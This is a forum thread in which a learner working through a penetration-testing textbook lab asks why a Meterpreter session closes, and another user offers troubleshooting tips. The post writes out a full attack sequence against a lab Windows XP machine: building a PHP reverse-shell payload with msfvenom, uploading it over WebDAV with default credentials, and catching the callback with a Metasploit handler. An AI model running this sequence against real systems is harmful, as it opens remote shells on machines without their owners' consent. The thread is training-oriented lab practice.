Ready to Start Your Career?

January 1, 2016
Meterpreter Session Not Starting

January 1, 2016
Hallo , first , my English is very slow ..... I am working with the book from Georgia Weidman, "Penetration Testing: A Hands-on Introduction to Hacking". On page 182 "Exploiting WebDAV Default Credentials". My host : Kali Linux My guest : Windows XP 64 bit with Service Pack 2 , install an VMware in another computer . Build my Payload , LHOST = My IP in Kali Linux : msfvenom -p php/meterpreter/reverse\_tcp LHOST=192.168.1xx.xx LPORT=443 -f raw > /tmp/meterpreter.php With Cadaver the WebDAV utility: cadaver https://192.168.1xx.xx/webdav # Guest IP then... dav:/webdav/> put /tmp/meterpreter.php Uploading /tmp/meterpreter.php to `/webdav/meterpreter.php': Progress: \[=============================>\] 100,0% of 1114 bytes succeeded. With MSFconsole : msf use multi/handler msf exploit(handler) > set payload php/meterpreter/reverse\_tcp payload => php/meterpreter/reverse\_tcp msf exploit(handler) > set LHOST 192.168.1xx.xx lhost => 192.168.1xx.xx msf exploit(handler) > set LPORT 443 lport => 443 msf exploit(handler) > exploit \[\] Exploit running as background job 0. \[\] Started reverse TCP handler on 192.168.1xx.xx:443 Then i going to Browser and write: http://192.168.1xx.xx/webdav/meterpreter.php In MSFconsole: \[\] Meterpreter session 1 opened (192.168.1xx.xx:443 -> 192.168.1xx.xx:1246) at 2017-11-13 16:24:47 +0100 \[-\] Meterpreter session 1 is not valid and will be closed \[\] 192.168.1xx.xx - Meterpreter session 1 closed. \[\*\] Sending stage (37543 bytes) to 192.168.1xx.xx But meterpreter > not come..... can please anybody help me , I am new with this things .......
1\. Try to connect back to a different Port than 443. Maybe something is using it... 2. Try the same without Metasploit using netcat and see if it works 3. Try the settings "ReverseListenerBindAddress" and "ReverseListenerBindPort" in Metasploit and set the same values like LHOST and LPORT.
@breuermar , thanks for your answer! , but that problem come in kali linux and Payloads for windows... , now what i to do is , first build the Payload and later change it to windows with i686-w64-mingw32-gcc -o ....
I don`t know , but every time i to search build a Payload with Msfvenom for windows in my kali linux , i come this problem ..., but only Payloads for windows ,payloads for Linux i come not this problem....